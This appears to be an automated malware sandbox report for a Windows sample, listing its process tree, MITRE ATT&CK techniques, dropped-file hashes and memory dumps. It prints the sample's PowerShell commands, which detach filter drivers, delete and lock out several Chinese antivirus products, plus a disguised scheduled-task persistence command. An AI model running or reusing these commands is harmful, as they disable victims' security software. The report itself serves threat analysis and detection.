    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c echo.>c:\inst.ini
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1656
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1960
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚÑ¶µçÄÔ¹Ü¼Ò' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðÉ½¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Filesize
3KB

MD5
69c282fdcd177c1ac4d6709ef841da65

SHA1
575cbac132f5215c9446e6b440ca44a2082f0644

SHA256
943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e

SHA512
6b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7

Download Submit
C:\ProgramData\Microsoft\Program\ziliao.jpg

Filesize
225KB

MD5
c008af87a4a4143c240b57073b584aaa

SHA1
712e4fed50b9d9e1c701babfcc677bcd21fa59eb

SHA256
43ffd0dc1301c1abb901c3e0fde94cb49a5a82c0317f95e890073a758678b6f7

SHA512
ebaf552eefe7770d210605f2745381ac6fd6688ae74e1c59e4683f5e6a7fdde8a2e3503ddb0a145f92a8a2d2104560ad7c6a174111c930ad153f2a761395d46f

Download Submit
C:\ProgramData\Program\Uninstall_.exe

Filesize
475KB

MD5
8d033e8817a7a1c54119523e668f5a32

SHA1
579aec8780f968e6e7809e5899bf91d79a026485

SHA256
5d75ab6114577bcd82dd2705da8cc33c86bdc9c9fcd0f00a9756aeb18f13f96a

SHA512
909145a965f4a550b8e00bfb598b3f475ba7c8ee50d053e74f7208baed335b7f75dab3de1667921f07de4a8d6a44e6c23c355b681dee0a81189e6f09dcacd57d

Download Submit
C:\ProgramData\Program\iusb3mon.dat

Filesize
74KB

MD5
7db8e66ef74c2ba301c9de02a08aab79

SHA1
8e6fc2a3c2374d59602ed5cfc8db0cce528bff46

SHA256
9897994028e66eba4c5691fe6ab4d9df527580c8a48f42066e51a82bb6ae2ee9

SHA512
30f5f87c68b34d83a6805977d5f573a46ee2b52836b070368427e355aab5823dab617cbe946a93087335a52432ed8689eb527521427049fd4d5f15d01e205278

Download Submit
C:\ProgramData\Program\iusb3mon.exe

Filesize
475KB

MD5
e79f996b69d7fa546ed9235fdc0ee06d

SHA1
b1616a455947ef3f29a4b5afdeda99369fc20bf8

SHA256
ec7fcd3f4533d3514a9a42cbc41c40358eea47255bab1171146a5ccebaf20990

SHA512
c0fd12425188d81be78be91facace2a036b81e29ffe4fde13b613a40bc20b39c656f1e0d91542b87973ffd2bc44e05b0354ecb1a488d391ee68f48cf43b44cf6

Download Submit
C:\ProgramData\templateWatch.dat

Filesize
59KB

MD5
02ad2cd3401ba2b6535ca8c4c59cdca8

SHA1
0054da15c86ec69825d7b35c24bc59ae166b237a

SHA256
c05212a3b64061a29f774c854f53fe91f13da53728be15acb14aeb56cba715de

SHA512
045ec50ecb801f5713930fa37e2e08ff0341d98c38842b5c61954c20feb1ce15a90a3b73b4edacdd1b21b64566e4757e90e155b9a417b9d2ff9fa533f5360333

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

Filesize
2KB

MD5
84d68259f9ef9eed8a0506d0e3ee64c5

SHA1
3f794f6c237fd19b2a89bd3356d94f92f47d4e0c

SHA256
1c0c719476ce20f1c0e18654df032fac81baf82d62c5e314e15f9e5ff26a0f20

SHA512
b1aaa468ea0297e8d4ced88765e4c064db7986880537cd8f90b85872720234b78f7e1fb853460e5fd10175fc60570c2885b4a4e5143fd790e1a9d651f1bbac51

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

Filesize
2KB

MD5
c6f29cf6f15bc123d0ac663038ccf886

SHA1
ad32e0b495d9d8e55265a3d5b0d6aad1f2123563

SHA256
467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884

SHA512
c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log

Filesize
2KB

MD5
380c0bb0dff3c47f06e90e6908a34d1a

SHA1
ed7b26eafb1de476cb2e701fc278a509b367a77d

SHA256
b5c4688241bf8318161a0f72358ed49979e0b805e3277330322f2b659328d68e

SHA512
51d46e2c827e314540190ab06b6f28356aedecd7d8a7aaacc221a54d54f9a8538e60bfe7c1c75b6b1eeb9f432fdd2d5af46c77d8dde4966f45d96ebde49b5ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

Filesize
2KB

MD5
e56fb06f9a607aa6c8152a4fc8e96706

SHA1
bc38d07f503c3c49fe6e84a8022d53ac93082446

SHA256
dbd0fd8d055836f959b37fdace40b39eee306817c41da62e9fd34fa2d5196a12

SHA512
d7f370f50719df1c1622354d2093cd65ffd9223a2a09674eae47d52b713bd6cf84be215dddc8c2f1480cb12173c2251a3a83409ac6267bda46248b922df3265d

Download Submit
C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

Filesize
2KB

MD5
5a18280aed20e8cc704c6211597e4195

SHA1
4286c3091e9bd83e03f1dd3b498b26b5cfb3741d

SHA256
4ef2d1e0d41531cbf24b559261586d4abb7f3aaa8637bd895f630ed3b1d3ba45

SHA512
49051747339cd89a2d3892f8b133ef60ff696681cdeaa257039763c37c8d606904c6b2ca3c623adf1a2d7002f5f44f1418fea017d9fc42ef688d3d2b2230dd85

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xlpd 5 Update Log.txt

Filesize
336B

MD5
2222a5996e27db096f7282a58586a28d

SHA1
a948f853596f483f43c5f0660f2ec0933d933e29

SHA256
e14b7c4e34cf496516856bfe69ff6a7aa483b89049eb2b45aa89162bef8aa714

SHA512
0497840e8bbc35818ca7a5ee457c1a707e9b50aaa55c02c00a9c9592cd280cc86420c05c6fe05da20feb35e43064638859576b40787eb5bce816189e2220f281

Download Submit
C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Filesize
4.9MB

MD5
2a7d5f8d3fb4ab753b226fd88d31453b

SHA1
2ba2f1e7d4c5ff02a730920f0796cee9b174820c

SHA256
879109ae311e9b88f930ce1c659f29ec0e338687004318661e604d0d3727e3cf

SHA512
fa520ebf9e2626008f479c6e8f472514980d105f917c48ad638a64177d77c82a651c34ed3f28f3e39e67f12e50920503b66e373b5e92cf606bc81dc62a6b3ea4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPG

Filesize
6KB

MD5
e39405e85e09f64ccde0f59392317dd3

SHA1
9c76db4b3d8c7972e7995ecfb1e3c47ee94fd14b

SHA256
cfd9677e1c0e10b1507f520c4ecd40f68db78154c0d4e6563403d540f3bf829f

SHA512
6733f330145b48d23c023c664090f4f240e9bbeb8368b486c8ee8682ec6a930b73275e24075648d1aa7e01db1ec7b7e259286917a006ba9af8fb7cba3439070a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f382fa884601820fe75d99a2975794fc

SHA1
c39890407d054e020e81247f1c5490dfbd92cb61

SHA256
367e8b8fca36dbbbf3759d3a14566ebecb7b1496c098146ed4009ee071c9d68d

SHA512
2653fb17a5b578a9be7a4c6b8a25007cdf1935ff5dd133deecb1e92de23bb251e66ff7da5ab8e1645dacb99644e54e6f596d63a8eb87bf881630de7c2dc7b854

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
65ead27e9e9e85d0153f08f740706c0f

SHA1
f4c6a4b721224cd898f8a931c2b76f1d498cc488

SHA256
9aa73eb58e4e0c714a1f1811c9be1d7b0e713d371dd9116fba5f884e0be988f3

SHA512
7ab68bca4215a04124850da77a996e05f0ce8bbcce006420f8de2517e62c4ab29f122b02d4c8121935acc5afd16316dcc1ef8b714e43bc94191bb42f75e5c07a

Download Submit
\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Filesize
329KB

MD5
958103e55c74427e5c66d7e18f3bf237

SHA1
cea3fc512763dc2ba1cfa9b7cb7a46ae89d9fcd8

SHA256
3ea4a4c3c6dea44d8917b342e93d653f59d93e1f552ace16e97e43bb04e951d8

SHA512
02ed6e1f24ef8f7f1c0377fa86a3a494b8a4474472ab7001f7902f2f3afa6cd975dc69fcab6f5524545a67657ecccfcd4ed2c95431843e9d50f2fff4c5178dbe

Download Submit
memory/1864-100-0x0000000003940000-0x0000000003980000-memory.dmp

Filesize
256KB

Download
memory/1864-106-0x0000000003940000-0x0000000003980000-memory.dmp

Filesize
256KB

Download
memory/1864-97-0x0000000000870000-0x000000000087F000-memory.dmp

Filesize
60KB

Download
memory/1864-194-0x0000000003940000-0x0000000003980000-memory.dmp

Filesize
256KB

Download
memory/1864-93-0x0000000010000000-0x0000000010004000-memory.dmp

Filesize
16KB

Download
memory/1864-92-0x0000000000860000-0x0000000000862000-memory.dmp

Filesize
8KB

Download
memory/1864-73-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/1864-221-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/2900-42-0x0000000002C00000-0x0000000002C08000-memory.dmp

Filesize
32KB

Download
memory/2900-41-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download